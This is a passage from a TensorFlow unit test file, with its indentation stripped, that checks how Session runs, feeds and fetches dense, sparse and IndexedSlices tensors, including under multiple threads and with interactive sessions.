self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
results_with_dict = s.run({'a': [a], 'b': b, 'z': [a, b]})
self.assertAllEqual([[1.0, 1.0]], results_with_dict['a'][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_dict['b'])
self.assertAllEqual(results_with_dict['a'][0], results_with_dict['z'][0])
self.assertAllEqual(results_with_dict['b'], results_with_dict['z'][1])
# Test nested structures
results_with_nested_list = s.run([[[a, b], b], a, [a, b]])
self.assertAllEqual([[1.0, 1.0]], results_with_nested_list[0][0][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_nested_list[0][0][1])
self.assertAllEqual(results_with_nested_list[0][0][0],
results_with_nested_list[1])
self.assertAllEqual(results_with_nested_list[1],
results_with_nested_list[2][0])
self.assertAllEqual(results_with_nested_list[0][0][1],
results_with_nested_list[0][1])
self.assertAllEqual(results_with_nested_list[0][1],
results_with_nested_list[2][1])
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float16, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Dict fetch
xy = s.run({'xy': tf_xy})['xy']
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Nested list fetch
xy = s.run([[[tf_xy]], tf_xy, [tf_xy]])
self.assertAllEqual(xy, [[[x + y]], x + y, [x + y]])
self.assertEqual(scalar, type(xy[0][0][0]))
self.assertEqual(scalar, type(xy[1]))
self.assertEqual(scalar, type(xy[2][0]))
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
constant_op.constant(indices), constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Dict fetch (single value), use as tuple
indices_out, values_out, shape_out = s.run({'sp': sp})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch (list value), use as tuple
(indices_out, values_out, shape_out), = s.run({'sp': [sp]})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch, use as SparseTensorValue
sp_out = s.run({'sp': sp})['sp']
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Nested list fetch use as tuple
sp_out = s.run([[[sp]], sp])
indices_out, values_out, shape_out = sp_out[0][0][0]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
indices_out, values_out, shape_out = sp_out[1]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Nested list fetch, use as SparseTensorValue
sp_out = s.run([[[sp]], sp])
self.assertAllEqual(sp_out[0][0][0].indices, indices)
self.assertAllEqual(sp_out[0][0][0].values, values)
self.assertAllEqual(sp_out[0][0][0].dense_shape, shape)
self.assertAllEqual(sp_out[1].indices, indices)
self.assertAllEqual(sp_out[1].values, values)
self.assertAllEqual(sp_out[1].dense_shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),
)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with tuple, fetch sp directly
sp_out = s.run(sp, {sp: (indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
# Feed SparseTensorValue and fetch sp directly.
sp_out = s.run(sp, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
def testFeedSparsePlaceholder(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderPartialShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
shape=[None, 9, 2], dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderConstantShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
dtype=np.float32, shape=shape, name='placeholder1')
self.assertAllEqual(sp.dense_shape.eval(session=s), shape)
self.assertAllEqual(tensor_util.constant_value(sp.dense_shape), shape)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),
)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape], {
ind: (values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape], {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(2, 3)), None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run([ind_values, ind_indices], {
ind: (values, indices)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run([ind_values, ind_indices], {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.VariableV1(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(
target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
@staticmethod
def _build_graph():
time.sleep(random.random() * 0.1)
# Do some graph construction. Try to exercise non-trivial paths.
graph = ops.get_default_graph()
gdef = None
for _ in range(10):
x = array_ops.placeholder(dtype=dtypes.float32)
with ops.colocate_with(x):
y = array_ops.placeholder(dtype=dtypes.float32)
with ops.device('/cpu:0'):
z = control_flow_ops.while_loop(
lambda x, y: x < 10, lambda x, y: (x + 1, x * y), [x, y])
with graph._attr_scope({'_a': attr_value_pb2.AttrValue(b=False)}):
gradients_impl.gradients(z, [x, y])
if gdef is None:
gdef = graph.as_graph_def()
else:
importer.import_graph_def(gdef, name='import')
def testParallelRunAndSingleBuild(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
stop = threading.Event()
def run_loop():
while not stop.is_set():
time.sleep(random.random() * 0.1)
self.assertEqual(sess.run(c), 5.0)
threads = [self.checkedThread(target=run_loop) for _ in range(10)]
for t in threads:
t.start()
SessionTest._build_graph()
stop.set()
for t in threads:
t.join()
def testParallelRunAndParallelBuild(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
stop = threading.Event()
def run_loop():
while not stop.is_set():
time.sleep(random.random() * 0.1)
self.assertEqual(sess.run(c), 5.0)
run_threads = [self.checkedThread(target=run_loop) for _ in range(10)]
for t in run_threads:
t.start()
build_threads = [self.checkedThread(target=SessionTest._build_graph)
for _ in range(10)]
for t in build_threads:
t.start()
for t in build_threads:
t.join()
# Let the run_threads run until the build threads are finished.
stop.set()
for t in run_threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
# Test nested tuple keys
z = (((array_ops.zeros([2]),),), array_ops.zeros([2]),
(array_ops.zeros([2]),))
result = [z[0][0][0] * 2, z[1] * 2, z[2][0] * 2]
values = (((np.array([1, 1]),),), np.array([2, 2]), (np.array([3, 3]),))
result_value = s.run(result, feed_dict={z: values})
self.assertAllEqual(result_value[0], 2 * np.ones(2))
self.assertAllEqual(result_value[1], 2 * np.array([2, 2]))
self.assertAllEqual(result_value[2], 2 * np.array([3, 3]))
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals('versions { producer: %d min_consumer: %d }' %
(versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEqual(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEqual(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEqual(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run([])
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run(())
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run({})
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
def testMultipleInteractiveSessionsWarning(self):
# Reinitialize the global state to ensure that the expected warnings will
# be emitted.
session.InteractiveSession._active_session_count = 0 # pylint: disable=protected-access
sess = session.InteractiveSession()
sess.run(constant_op.constant(4.0)) # Run so that the session is "opened".
sess.close()
# Opening and closing interactive sessions serially should not warn.
with warnings.catch_warnings(record=True) as w:
sess = session.InteractiveSession()
sess.close()
self.assertEqual(0, len(w))
with warnings.catch_warnings(record=True) as w:
sess = session.InteractiveSession()
self.assertEqual(0, len(w))
with warnings.catch_warnings(record=True) as w:
sess2 = session.InteractiveSession()
self.assertEqual(1, len(w))
self.assertTrue('An interactive session is already active. This can cause '
'out-of-memory errors in some cases. You must explicitly '
'call `InteractiveSession.close()` to release resources '
'held by the other session(s).' in str(w[0].message))
sess2.close()
sess.close()
def testInteractivePlacePrunedGraph(self):
sess = session.InteractiveSession()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/device:GPU:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
# Only run the valid op, this should work.
b.eval()
with self.assertRaises(errors.InvalidArgumentError):
a.eval()
sess.close()
def testDefaultSessionPlacePrunedGraph(self):
sess = session.Session()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/device:GPU:0'):
_ = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
with self.assertRaises(errors.InvalidArgumentError):
# Even though we don't run the bad op, we place the entire
# graph, which should fail with a non-interactive session.
sess.run(b)
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session() as sess:
for dtype in [
dtypes.float16, dtypes.float32, dtypes.float64, dtypes.int32,
dtypes.uint8, dtypes.int16, dtypes.int8, dtypes.int64, dtypes.bool,
dtypes.complex64, dtypes.complex128
]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
elif dtype == dtypes.complex128:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
sess.run(out_t, feed_dict={
feed_t: np_array
}))
# Check that we can also get the feed back.
self.assertAllEqual(np_array,
sess.run(feed_t, feed_dict={
feed_t: np_array
}))
# Also check that we can get both back.
out_v, feed_v = sess.run(
[out_t, feed_t], feed_dict={
feed_t: np_array
})
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
feed_fetch_runner = sess.make_callable([out_t, feed_t], [feed_t])
out_v, feed_v = feed_fetch_runner(np_array)
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
def testMakeCallableOnTensorWithRunOptions(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
tensor_runner = sess.make_callable(a, accept_options=True)
run_options = config_pb2.RunOptions(
